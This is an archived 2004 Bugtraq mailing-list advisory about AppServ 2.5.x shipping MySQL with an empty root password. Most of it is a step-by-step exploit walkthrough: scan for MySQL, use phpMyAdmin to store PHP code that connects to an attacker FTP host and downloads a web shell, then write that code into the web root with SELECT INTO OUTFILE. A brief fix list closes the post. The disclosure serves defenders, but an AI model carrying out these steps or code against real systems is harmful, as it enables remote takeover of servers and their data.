lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041118161815.26349.qmail@www.securityfocus.com>
Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@...oo.com>
To: bugtraq@...urityfocus.com
Subject: AppServ 2.5.x and Prior Exploit




what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages. 

Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver. 
=====================================================
AppServ URL:http://www.appservnetwork.com

Vulnerability Ver: 2.5.X and prior

problem :
=================================

the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.

=================================


Expliot Method

1)scan tool (SuperScan or whatever) 
this step to scan MySQL service on port 3306

2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer).
From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)

3)if we success the index page for AppServ open 

4)Now we can edit the databases and tables in Mysql by phpmyadmin
From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)

5)default MySQL Server come with two database (test,mysql),our target is (mysql ).
Now we can add new table contains our exploit 

- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :

==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>

==============end=====================

the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.

 
 6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'

7)Query.php contain Our PHP code 

8)if we success we can reguest 
(http://xxx.xxx.xxx.xxx/Query.php)

9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)

10) Game's Over

==================================================
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script

==============================================================

                       discovered by  Saudi Linux


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ